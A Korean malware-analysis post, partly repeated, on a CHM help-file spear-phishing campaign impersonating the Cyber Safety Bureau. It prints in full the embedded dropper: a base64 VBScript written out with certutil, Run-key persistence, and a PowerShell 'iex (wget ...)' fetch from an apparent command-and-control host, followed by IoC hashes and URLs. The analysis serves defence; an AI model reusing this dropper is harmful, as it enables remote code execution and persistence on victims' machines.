북한 관련 법인을 노리는 CHM 악성코드
Contents
개요
국내 북한 관련 법인을 대상으로한 스피어피싱 공격이 발견되었다. 공격자는 사이버안전국을 사칭한 스피어피싱 이메일을 작성하고, 압축된 CHM 악성코드를 첨부해 발송했다. 메일 본문에는 사용자의 메일이 스팸 메일 발송에 사용된 것처럼 내용을 꾸며 첨부파일을 열어보도록 유도한다.
[그림 1] 스피어피싱 이메일
CHM 파일
정보통신망이용촉진 및 정보보호.zip 파일의 압축 내부에는 압축된 CHM 파일과 ini파일이 존재한다.
사이버안전국.ini : 빈 파일
정보통신망이용촉진 및 정보보호.zip : 압축된 chm 악성코드
정보통신망이용촉진 및 정보보호.chm : chm 악성코드
chm 파일은 윈도우 도움말 파일이며 정보통신망 이용과 관련된 법률 내용을 담고 있다.
[그림 2] chm 파일
도움말 형태의 문서가 출력되면서, 백그라운드에서는 악성행위를 수행한다. html 파일 내부에는 shortcut.Click() 를 통해 악성 스크립트가 포함된 함수를 실행하고, 파워쉘 스크립트를 드롭해 실행한다.
[그림 3] html 내 삽입된 악성 스크립트
cmd, /c echo U3ViIFdNUHJvYyhwX2NtZCkNCglzZXQgd20gPSBHZXRPYmplY3QoIndpbm1nbXRzOndpbjMyX3Byb2Nlc3MiKQ0KCXNldCBvd3MgPSBHZXRPYmplY3QoIndpbm1nbXRzOlxyb290XGNpbXYyIikNCglzZXQgb3N0ID0gb3dzLkdldCgiV2luMzJfUHJvY2Vzc1N0YXJ0dXAiKQ0KCXNldCBvY29uZiA9IG9zdC5TcGF3bkluc3RhbmNlXw0KCW9jb25mLlNob3dXaW5kb3cgPSAxMg0KCWVyclJldHVybiA9IHdtLkNyZWF0ZShwX2NtZCwgTnVsbCwgb2NvbmYsIHBpZCkNCkVuZCBTdWINCg0KdXJpID0gImh0dHA6Ly9pYnNxLmNvLmtyL2NvbmZpZyINCnBvd19jbWQgPSAiY21kIC9jIHBvd2Vyc2hlbGwgLWNvbW1hbmQgIiJpZXggKHdnZXQgeHh4L2RlbW8udHh0KS5jb250ZW50OyBJbmZvS2V5IC11ciAneHh4JyIiIg0KcG93X2NtZCA9IFJlcGxhY2UocG93X2NtZCwgInh4eCIsIHVyaSkNCldNUHJvYyhwb3dfY21kKQ >"%USERPROFILE%\Links\Document.dat" & start /MIN certutil -decode "%USERPROFILE%\Links\Document.dat" "%USERPROFILE%\Links\Document.vbs" & start /MIN REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Document /t REG_SZ /d "%USERPROFILE%\Links\Document.vbs" /f
백그라운드에서 실행되는 스크립트는 아래와 같이 동작한다.
base64로 인코딩된 파워쉘 스크립트를 %USERPROFILE%\Links\Document.dat 로 저장
certutil을 이용해 파워쉘 스크립트를 디코딩해 Document.vbs 파일로 저장
command : start /MIN certutil -decode "%USERPROFILE%\Links\Document.dat
REG …
국내 북한 관련 법인을 대상으로한 스피어피싱 공격이 발견되었다. 공격자는 사이버안전국을 사칭한 스피어피싱 이메일을 작성하고, 압축된 CHM 악성코드를 첨부해 발송했다. 메일 본문에는 사용자의 메일이 스팸 메일 발송에 사용된 것처럼 내용을 꾸며 첨부파일을 열어보도록 유도한다.
[그림 1] 스피어피싱 이메일
CHM 파일
정보통신망이용촉진 및 정보보호.zip 파일의 압축 내부에는 압축된 CHM 파일과 ini파일이 존재한다.
사이버안전국.ini : 빈 파일
정보통신망이용촉진 및 정보보호.zip : 압축된 chm 악성코드
정보통신망이용촉진 및 정보보호.chm : chm 악성코드
chm 파일은 윈도우 도움말 파일이며 정보통신망 이용과 관련된 법률 내용을 담고 있다.
[그림 2] chm 파일
도움말 형태의 문서가 출력되면서, 백그라운드에서는 악성행위를 수행한다. html 파일 내부에는 shortcut.Click() 를 통해 악성 스크립트가 포함된 함수를 실행하고, 파워쉘 스크립트를 드롭해 실행한다.
[그림 3] html 내 삽입된 악성 스크립트
cmd, /c echo U3ViIFdNUHJvYyhwX2NtZCkNCglzZXQgd20gPSBHZXRPYmplY3QoIndpbm1nbXRzOndpbjMyX3Byb2Nlc3MiKQ0KCXNldCBvd3MgPSBHZXRPYmplY3QoIndpbm1nbXRzOlxyb290XGNpbXYyIikNCglzZXQgb3N0ID0gb3dzLkdldCgiV2luMzJfUHJvY2Vzc1N0YXJ0dXAiKQ0KCXNldCBvY29uZiA9IG9zdC5TcGF3bkluc3RhbmNlXw0KCW9jb25mLlNob3dXaW5kb3cgPSAxMg0KCWVyclJldHVybiA9IHdtLkNyZWF0ZShwX2NtZCwgTnVsbCwgb2NvbmYsIHBpZCkNCkVuZCBTdWINCg0KdXJpID0gImh0dHA6Ly9pYnNxLmNvLmtyL2NvbmZpZyINCnBvd19jbWQgPSAiY21kIC9jIHBvd2Vyc2hlbGwgLWNvbW1hbmQgIiJpZXggKHdnZXQgeHh4L2RlbW8udHh0KS5jb250ZW50OyBJbmZvS2V5IC11ciAneHh4JyIiIg0KcG93X2NtZCA9IFJlcGxhY2UocG93X2NtZCwgInh4eCIsIHVyaSkNCldNUHJvYyhwb3dfY21kKQ >"%USERPROFILE%\Links\Document.dat" & start /MIN certutil -decode "%USERPROFILE%\Links\Document.dat" "%USERPROFILE%\Links\Document.vbs" & start /MIN REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Document /t REG_SZ /d "%USERPROFILE%\Links\Document.vbs" /f
백그라운드에서 실행되는 스크립트는 아래와 같이 동작한다.
base64로 인코딩된 파워쉘 스크립트를 %USERPROFILE%\Links\Document.dat 로 저장
certutil을 이용해 파워쉘 스크립트를 디코딩해 Document.vbs 파일로 저장
command : start /MIN certutil -decode "%USERPROFILE%\Links\Document.dat
REG …
IoC
7773DFD975802295CF27E4B80B6492DF
4930CFBDF0653952D769D95330D4F43B
DED83A6BD7438B34B058F2FE5EE54C7E
http://ibsq.co/.kr/config/show.php
http://ibsq.co/]kr/config/demo.txt
4930CFBDF0653952D769D95330D4F43B
DED83A6BD7438B34B058F2FE5EE54C7E
http://ibsq.co/.kr/config/show.php
http://ibsq.co/]kr/config/demo.txt